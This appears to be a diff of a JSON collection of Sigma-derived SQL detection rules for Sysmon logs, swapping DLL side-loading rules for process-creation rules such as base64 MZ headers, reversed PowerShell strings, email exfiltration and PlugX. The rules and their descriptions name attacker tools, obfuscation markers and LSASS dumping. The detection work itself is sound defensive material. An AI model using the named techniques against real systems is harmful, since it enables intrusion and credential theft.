"SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\keytool.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\'))" ], - "filename": "image_load_uac_bypass_via_dism.yml" + "filename": "proc_creation_win_java_keytool_susp_child_process.yml" }, { - "title": "Fax Service DLL Search Order Hijack", - "id": "828af599-4c53-4ed2-ba4a-a9f835c434ea", - "status": "test", - "description": "The Fax service attempts to load ualapi.dll, which is non-existent. An attacker can then (side)load their own malicious DLL using this service.", - "author": "NVISO", + "title": "Base64 MZ Header In CommandLine", + "id": "22e58743-4ac8-4a9f-bf19-00a0428d8c5f", + "status": "experimental", + "description": "Detects encoded base64 MZ header in the commandline", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1574.001", - "attack.t1574.002" + "attack.execution" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\fxssvc.exe' ESCAPE '\\' AND ImageLoaded LIKE '%ualapi.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%TVqQAAMAAAAEAAAA%' ESCAPE '\\' OR CommandLine LIKE '%TVpQAAIAAAAEAA8A%' ESCAPE '\\' OR CommandLine LIKE '%TVqAAAEAAAAEABAA%' ESCAPE '\\' OR CommandLine LIKE '%TVoAAAAAAAAAAAAA%' ESCAPE '\\' OR CommandLine LIKE '%TVpTAQEAAAAEAAAA%' ESCAPE '\\'))" ], - "filename": "image_load_side_load_ualapi.yml" + "filename": "proc_creation_win_susp_inline_base64_mz_header.yml" }, { - "title": "Microsoft Office DLL Sideload", - "id": "829a3bdf-34da-4051-9cf4-8ed221a8ae4f", - "status": "experimental", - "description": "Detects DLL sideloading of DLLs that are part of Microsoft Office from non standard location", - "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", + "title": "Potential PlugX Activity", + "id": "aeab5ec5-be14-471a-80e8-e344418305c2", + "status": "test", + "description": "Detects the execution of an executable that is typically used by PlugX for DLL side loading starting from an uncommon location", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.s0013", "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", "attack.t1574.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\outllib.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\Root\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\Root\\\\OFFICE%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((((((((((Image LIKE '%\\\\CamMute.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Lenovo\\\\Communication Utility\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Lenovo\\\\Communications Utility\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\chrome\\_frame\\_helper.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\Google\\\\Chrome\\\\application\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\dvcemumanager.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\Microsoft Device Emulator\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\Gadget.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\Windows Media Player\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\hcc.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\HTML Help Workshop\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\hkcmd.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\SysNative\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\SysWow64\\\\%' ESCAPE '\\')))) OR (Image LIKE '%\\\\Mc.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Kit%' ESCAPE '\\')))) OR (Image LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft Security Client\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Defender\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\AntiMalware\\\\%' ESCAPE '\\')))) OR (Image LIKE '%\\\\msseces.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft Security Center\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft Security Client\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft Security Essentials\\\\%' ESCAPE '\\')))) OR (Image LIKE '%\\\\OInfoP11.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\Common Files\\\\Microsoft Shared\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\OleView.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Kit%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Resource Kit\\\\%' ESCAPE '\\')))) OR (Image LIKE '%\\\\rc.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Kit%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Resource Kit\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft.NET\\\\%' ESCAPE '\\')))))" ], - "filename": "image_load_side_load_office_dlls.yml" + "filename": "proc_creation_win_malware_plugx_susp_exe_locations.yml" }, { - "title": "Suspicious Volume Shadow Copy Vsstrace.dll Load", - "id": "48bfd177-7cf2-412b-ad77-baf923489e82", + "title": "PowerShell Base64 Encoded WMI Classes", + "id": "1816994b-42e1-4fb1-afd2-134d88184f71", "status": "experimental", - "description": "Detects the image load of VSS DLL by uncommon executables", - "author": "frack113", + "description": "Detects calls to base64 encoded WMI class such as \"Win32_Shadowcopy\", \"Win32_ScheduledJob\", etc.", + "author": "Christian Burkard (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.execution", + "attack.t1059.001", "attack.defense_evasion", - "attack.impact", - "attack.t1490" + "attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\vsstrace.dll' ESCAPE '\\' AND NOT (((Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\Temp\\\\{%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND ((CommandLine LIKE '%VwBpAG4AMwAyAF8AUwBoAGEAZABvAHcAYwBvAHAAeQ%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBTAGgAYQBkAG8AdwBjAG8AcAB5A%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfU2hhZG93Y29we%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1NoYWRvd2NvcH%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9TaGFkb3djb3B5%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AUwBjAGgAZQBkAHUAbABlAGQASgBvAGIA%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFMAYwBoAGUAZAB1AGwAZQBkAEoAbwBiA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBTAGMAaABlAGQAdQBsAGUAZABKAG8AYg%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfU2NoZWR1bGVkSm9i%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1NjaGVkdWxlZEpvY%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9TY2hlZHVsZWRKb2%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcw%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzA%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfUHJvY2Vzc%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1Byb2Nlc3%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Qcm9jZXNz%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AVQBzAGUAcgBBAGMAYwBvAHUAbgB0A%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFUAcwBlAHIAQQBjAGMAbwB1AG4AdA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBVAHMAZQByAEEAYwBjAG8AdQBuAHQA%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfVXNlckFjY291bn%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1VzZXJBY2NvdW50%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Vc2VyQWNjb3Vud%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8ATABvAGcAZwBlAGQATwBuAFUAcwBlAHIA%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAEwAbwBnAGcAZQBkAE8AbgBVAHMAZQByA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBMAG8AZwBnAGUAZABPAG4AVQBzAGUAcg%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfTG9nZ2VkT25Vc2Vy%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX0xvZ2dlZE9uVXNlc%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Mb2dnZWRPblVzZX%' ESCAPE '\\')))" ], - "filename": "image_load_dll_vsstrace_susp_load.yml" + "filename": "proc_creation_win_powershell_base64_wmi_classes.yml" }, { - "title": "Pingback Backdoor DLL Loading Activity", - "id": "35a7dc42-bc6f-46e0-9f83-81f8e56c8d4b", - "status": "experimental", - "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", - "author": "Bhabesh Raj", + "title": "Potential PowerShell Obfuscation Via Reversed Commands", + "id": "b6b49cd1-34d6-4ead-b1bf-176e9edba9a4", + "status": "test", + "description": "Detects the presence of reversed PowerShell commands in the CommandLine. This is often used as a method of obfuscation by attackers", + "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", "tags": [ - "attack.persistence", - "attack.t1574.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\msdtc.exe' ESCAPE '\\' AND ImageLoaded LIKE 'C:\\\\Windows\\\\oci.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%hctac%' ESCAPE '\\' OR CommandLine LIKE '%kaerb%' ESCAPE '\\' OR CommandLine LIKE '%dnammoc%' ESCAPE '\\' OR CommandLine LIKE '%ekovn%' ESCAPE '\\' OR CommandLine LIKE '%eliFd%' ESCAPE '\\' OR CommandLine LIKE '%rahc%' ESCAPE '\\' OR CommandLine LIKE '%etirw%' ESCAPE '\\' OR CommandLine LIKE '%golon%' ESCAPE '\\' OR CommandLine LIKE '%tninon%' ESCAPE '\\' OR CommandLine LIKE '%eddih%' ESCAPE '\\' OR CommandLine LIKE '%tpircS%' ESCAPE '\\' OR CommandLine LIKE '%ssecorp%' ESCAPE '\\' OR CommandLine LIKE '%llehsrewop%' ESCAPE '\\' OR CommandLine LIKE '%esnopser%' ESCAPE '\\' OR CommandLine LIKE '%daolnwod%' ESCAPE '\\' OR CommandLine LIKE '%tneilCbeW%' ESCAPE '\\' OR CommandLine LIKE '%tneilc%' ESCAPE '\\' OR CommandLine LIKE '%ptth%' ESCAPE '\\' OR CommandLine LIKE '%elifotevas%' ESCAPE '\\' OR CommandLine LIKE '%46esab%' ESCAPE '\\' OR CommandLine LIKE '%htaPpmeTteG%' ESCAPE '\\' OR CommandLine LIKE '%tcejbO%' ESCAPE '\\' OR CommandLine LIKE '%maerts%' ESCAPE '\\' OR CommandLine LIKE '%hcaerof%' ESCAPE '\\' OR CommandLine LIKE '%retupmoc%' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%-EncodedCommand%' ESCAPE '\\' AND CommandLine LIKE '%rahc%' ESCAPE '\\')))" ], - "filename": "image_load_malware_pingback_backdoor.yml" + "filename": "proc_creation_win_powershell_cmdline_reversed_strings.yml" }, { - "title": "WMI Persistence - Command Line Event Consumer", - "id": "05936ce2-ee05-4dae-9d03-9a391cf2d2c6", - "status": "test", - "description": "Detects WMI command line event consumers", - "author": "Thomas Patzke", + "title": "Email Exifiltration Via Powershell", + "id": "312d0384-401c-4b8b-abdf-685ffba9a332", + "status": "experimental", + "description": "Detects email exfiltration via powershell cmdlets", + "author": "Nasreddine Bencherchali (Nextron Systems), Azure-Sentinel (idea)", "tags": [ - "attack.t1546.003", - "attack.persistence" + "attack.exfiltration" ], "falsepositives": [ - "Unknown (data set is too small; further testing needed)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\wbemcons.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%Add-PSSnapin%' ESCAPE '\\' AND CommandLine LIKE '%Get-Recipient%' ESCAPE '\\' AND CommandLine LIKE '%-ExpandProperty%' ESCAPE '\\' AND CommandLine LIKE '%EmailAddresses%' ESCAPE '\\' AND CommandLine LIKE '%SmtpAddress%' ESCAPE '\\' AND CommandLine LIKE '%-hidetableheaders%' ESCAPE '\\')" ], - "filename": "image_load_wmi_persistence_commandline_event_consumer.yml" + "filename": "proc_creation_win_powershell_email_exfil.yml" }, { - "title": "VBA DLL Loaded Via Office Application", - "id": "e6ce8457-68b1-485b-9bdd-3c2b5d679aa9", + "title": "Network Reconnaissance Activity", + "id": "e6313acd-208c-44fc-a0ff-db85d572e90e", "status": "test", - "description": "Detects VB DLL's loaded by an office application. Which could indicate the presence of VBA Macros.", - "author": "Antonlovesdnb", + "description": "Detects a set of suspicious network related commands often used in recon stages", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.discovery", + "attack.t1087", + "attack.t1082", + "car.2016-03-001" ], "falsepositives": [ - "Legitimate macro usage. Add the appropriate filter according to your environment" + "False positives depend on scripts and administrative tools used in the monitored environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\') AND (ImageLoaded LIKE '%\\\\VBE7.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\VBEUI.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\VBE7INTL.DLL' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%nslookup%' ESCAPE '\\' AND CommandLine LIKE '%\\_ldap.\\_tcp.dc.\\_msdcs.%' ESCAPE '\\')" ], - "filename": "image_load_office_vbadll_load.yml" + "filename": "proc_creation_win_nslookup_domain_discovery.yml" }, { - "title": "Suspicious Volume Shadow Copy Vssapi.dll Load", - "id": "37774c23-25a1-4adb-bb6d-8bb9fd59c0f8", + "title": "Abuse of Service Permissions to Hide Services Via Set-Service", + "id": "514e4c3a-c77d-4cde-a00f-046425e2301e", "status": "experimental", - "description": "Detects the image load of VSS DLL by uncommon executables", - "author": "frack113", + "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.persistence", "attack.defense_evasion", - "attack.impact", - "attack.t1490" + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ - "Unknown" + "Rare intended use of hidden services" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\vssapi.dll' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\Temp\\\\{%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\ProgramData\\\\Package Cache\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR OriginalFileName = 'pwsh.dll') AND (CommandLine LIKE '%Set-Service %' ESCAPE '\\' AND CommandLine LIKE '%DCLCWPDTSD%' ESCAPE '\\') AND (CommandLine LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR CommandLine LIKE '%-sd %' ESCAPE '\\'))" ], - "filename": "image_load_dll_vssapi_susp_load.yml" + "filename": "proc_creation_win_powershell_hide_services_via_set_service.yml" }, { - "title": "Potential DLL Sideloading Via VMware Xfer", - "id": "9313dc13-d04c-46d8-af4a-a930cc55d93b", + "title": "PUA - NPS Tunneling Tool Execution", + "id": "68d37776-61db-42f5-bf54-27e87072d17e", "status": "experimental", - "description": "Detects loading of a DLL by the VMware Xfer utility from the non-default directory which may be an attempt to sideload arbitrary DLL", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the use of NPS, a port forwarding and intranet penetration proxy server", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.command_and_control", + "attack.t1090" ], "falsepositives": [ - "Unlikely" + "Legitimate use" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\VMwareXferlogs.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\glib-2.0.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Program Files\\\\VMware\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\npc.exe' ESCAPE '\\' OR (CommandLine LIKE '% -server=%' ESCAPE '\\' AND CommandLine LIKE '% -vkey=%' ESCAPE '\\' AND CommandLine LIKE '% -password=%' ESCAPE '\\') OR CommandLine LIKE '% -config=npc%' ESCAPE '\\' OR ((Hashes LIKE '%MD5=AE8ACF66BFE3A44148964048B826D005%' ESCAPE '\\' OR Hashes LIKE '%SHA1=CEA49E9B9B67F3A13AD0BE1C2655293EA3C18181%' ESCAPE '\\' OR Hashes LIKE '%SHA256=5A456283392FFCEEEACA3D3426C306EB470304637520D72FED1CC1FEBBBD6856%' ESCAPE '\\') OR md5 = 'ae8acf66bfe3a44148964048b826d005' OR sha1 = 'cea49e9b9b67f3a13ad0be1c2655293ea3c18181' OR sha256 = '5a456283392ffceeeaca3d3426c306eb470304637520d72fed1cc1febbbd6856')))" ], - "filename": "image_load_side_load_vmware_xfer.yml" + "filename": "proc_creation_win_pua_nps.yml" }, { - "title": "Aruba Network Service Potential DLL Sideloading", - "id": "90ae0469-0cee-4509-b67f-e5efcef040f7", + "title": "Wusa Extracting Cab Files From Suspicious Paths", + "id": "c74c0390-3e20-41fd-a69a-128f0275a5ea", "status": "experimental", - "description": "Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access \"arubanetsvc.exe\" process using DLL Search Order Hijacking", + "description": "Detects usage of the \"wusa.exe\" (Windows Update Standalone Installer) utility to extract cab using the \"/extract\" argument from suspicious paths", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.persistence", - "attack.t1574.001", - "attack.t1574.002" + "attack.execution" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\arubanetsvc.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\wtsapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcr100.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcp100.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wininet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iphlpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\version.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wldp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\profapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sspicli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dpapi.dll' ESCAPE '\\')) AND NOT ((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wusa.exe' ESCAPE '\\' AND CommandLine LIKE '%/extract:%' ESCAPE '\\' AND (CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Appdata\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\'))" ], - "filename": "image_load_side_load_aruba_networks_virtual_intranet_access.yml" + "filename": "proc_creation_win_wusa_cab_files_extraction_from_susp_paths.yml" }, { - "title": "Suspicious Unsigned Dbghelp/Dbgcore DLL Loaded", - "id": "bdc64095-d59a-42a2-8588-71fd9c9d9abc", + "title": "Potential PowerShell Obfuscation Via WCHAR", + "id": "e312efd0-35a1-407f-8439-b8d434b438a6", "status": "test", - "description": "Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes.\nTools like ProcessHacker and some attacker tradecract use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.\nAs an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.\n", - "author": "Perez Diego (@darkquassar), oscd.community, Ecco", + "description": "Detects suspicious encoded character syntax often used for defense evasion", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\') AND Signed = 'false')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%(WCHAR)0x%' ESCAPE '\\')" ], - "filename": "image_load_dll_dbghelp_dbgcore_unsigned_load.yml" + "filename": "proc_creation_win_powershell_obfuscation_via_utf8.yml" }, { - "title": "DLL Load By System Process From Suspicious Locations", - "id": "9e9a9002-56c4-40fd-9eff-e4b09bfa5f6c", + "title": "Potential Signing Bypass Via Windows Developer Features", + "id": "a383dec4-deec-4e6e-913b-ed9249670848", "status": "experimental", - "description": "Detects when a system process (ie located in system32, syswow64...etc) loads a DLL from a suspicious location such as %temp%", + "description": "Detects when a user enable developer features such as \"Developer Mode\" or \"Application Sideloading\". Which allows the user to install untrusted packages.", 